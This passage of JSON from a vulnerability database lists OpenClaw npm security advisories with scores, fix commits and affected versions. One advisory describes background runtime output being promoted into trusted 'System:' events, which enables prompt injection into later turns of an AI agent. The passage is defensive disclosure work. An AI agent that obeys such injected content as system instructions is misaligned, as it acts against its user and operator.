erability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-33576","GHSA-v2v2-f783-358j"],"risk_score":4.4,"exploitability":"0.5","weighted_severity":"8.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4jwj-6s5z-wbeq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91654?format=json","vulnerability_id":"VCID-4nwq-14y4-xkhp","summary":"OpenClaw: BlueBubbles Webhook Missing Rate Limiting Enables Brute-Force Password Guessing\n## Summary\n\nBlueBubbles Webhook Missing Guess Rate Limiting Enables Brute-Force Guessing of Weak Webhook Password\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nBlueBubbles webhook auth previously rejected wrong passwords without throttling repeated guesses, allowing brute-force attempts against weak webhook passwords. 
Commit `5e08ce36d522a1c96df2bfe88e39303ae2643d92` adds repeated-guess throttling before auth failure responses.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `5e08ce36d522a1c96df2bfe88e39303ae2643d92`.\n\n## Fix Commit(s)\n\n- `5e08ce36d522a1c96df2bfe88e39303ae2643d92`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35623","reference_id":"","reference_type":"","scores":[{"value":"0.00108","scoring_system":"epss","scoring_elements":"0.28542","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00108","scoring_system":"epss","scoring_elements":"0.28579","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00108","scoring_system":"epss","scoring_elements":"0.2862","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35623"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/5e08ce36d522a1c96df2bfe88e39303ae2643d92","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T15:52:54Z/"}],"url":"https://github.com/openclaw/openclaw/commit/5e08ce36d522a1c96df2bfe88e39303ae2643d92"},{"reference_url":"https
://github.com/openclaw/openclaw/security/advisories/GHSA-xq8g-hgh6-87hv","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T15:52:54Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xq8g-hgh6-87hv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35623","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35623"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-webhook-password-rate-limiting","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T15:52:54Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-webhook-password-rate-limiting"},{"reference_url":"https://github.com/advisories/GHSA-xq8g-hgh6-87hv
","reference_id":"GHSA-xq8g-hgh6-87hv","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xq8g-hgh6-87hv"}],"fixed_packages":[],"aliases":["CVE-2026-35623","GHSA-xq8g-hgh6-87hv"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4nwq-14y4-xkhp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/92152?format=json","vulnerability_id":"VCID-4u3z-rs45-gbhe","summary":"OpenClaw: Workspace dotenv files cannot override connector endpoint hosts\n## Summary\nWorkspace dotenv files cannot override connector endpoint hosts.\n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nA workspace .env file could set connector endpoint variables for Matrix, Mattermost, IRC, or Synology-related connectors and redirect runtime traffic away from the operator-configured endpoint.\n\n## Fix\nWorkspace .env loading now blocks those endpoint variables, including per-account Matrix homeserver suffixes and generic base-url/API-host style overrides. 
Trusted global runtime dotenv loading remains separate.\n\n## Fix Commit(s)\n- 0623079e98abf7202591f1b04a89755eb7ec9272\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nOpenClaw thanks @qi-scape for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-45003","reference_id":"","reference_type":"","scores":[{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01337","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01342","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01341","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-45003"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/0623079e98abf7202591f1b04a89755eb7ec9272","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"},{"value":"4.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:25:02Z/"
}],"url":"https://github.com/openclaw/openclaw/commit/0623079e98abf7202591f1b04a89755eb7ec9272"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-55cf-xx38-4p9p","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:25:02Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-55cf-xx38-4p9p"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-45003","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-45003"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-connector-endpoint-host-override-via-workspace-dotenv-files","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"},{"value":"4.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scori
ng_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:25:02Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-connector-endpoint-host-override-via-workspace-dotenv-files"},{"reference_url":"https://github.com/advisories/GHSA-55cf-xx38-4p9p","reference_id":"GHSA-55cf-xx38-4p9p","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-55cf-xx38-4p9p"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114466?format=json","purl":"pkg:npm/openclaw@2026.4.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-ye4t-n6r3-67ab"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22"}],"aliases":["CVE-2026-45003","GHSA-55cf-xx38-4p9p"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4u3z-rs45-gbhe"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91107?format=json","vulnerability_id":"VCID-4uqc-3h1c-4yhs","summary":"OpenClaw: Feishu webhook reads and parses unauthenticated request bodies before signature validation\n## Summary\n\nFeishu webhook reads and parses unauthenticated request bodies before signature validation\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nFeishu webhook handling previously parsed JSON before signature validation, which let unauthenticated callers force full JSON parsing work before rejection. 
Commit `5e8cb22176e9235e224be0bc530699261eb60e53` reads the raw request body, validates the signature first, and only then parses JSON.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `5e8cb22176e9235e224be0bc530699261eb60e53`.\n\n## Fix Commit(s)\n\n- `5e8cb22176e9235e224be0bc530699261eb60e53`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35640","reference_id":"","reference_type":"","scores":[{"value":"0.00127","scoring_system":"epss","scoring_elements":"0.31558","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00127","scoring_system":"epss","scoring_elements":"0.31486","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00127","scoring_system":"epss","scoring_elements":"0.31523","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35640"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/5e8cb22176e9235e224be0bc530699261eb60e53","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:25:51Z/"}],"url":"https://github.com/openclaw/openclaw/commit/5e8cb22176e9235e224be0bc530699261eb60e53"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3h52-cx59-c456","reference_i
d":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:25:51Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3h52-cx59-c456"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35640","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35640"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-unauthenticated-webhook-request-parsing","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:25:51Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-unauthenticated-webhook-request-parsing"},{"reference_url":"https://github.com/advisories/GHSA-3h52-cx59-c456","reference_id":"GHSA-3h52-cx59-c456","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3h52-cx59
-c456"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerabi
lity":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerabi
lity":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerabi
lity":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-35640","GHSA-3h52-cx59-c456"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4uqc-3h1c-4yhs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89602?format=json","vulnerability_id":"VCID-4urc-4536-pqhk","summary":"OpenClaw: Lower-trust background runtime output is injected into trusted `System:` events, and local async exec completion misses the intended `exec-event` downgrade\n## Impact\n\nLower-trust background runtime output is injected into trusted `System:` events, and local async exec completion misses the intended `exec-event` downgrade.\n\nLower-trust runtime/background output could be promoted into trusted System events, allowing prompt-injection into later agent turns.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.2`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. 
The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @tdjackey for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-gfmx-pph7-g46x","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-gfmx-pph7-g46x"},{"reference_url":"https://github.com/advisories/GHSA-gfmx-pph7-g46x","reference_id":"GHSA-gfmx-pph7-g46x","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gfmx-pph7-g46x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vuln
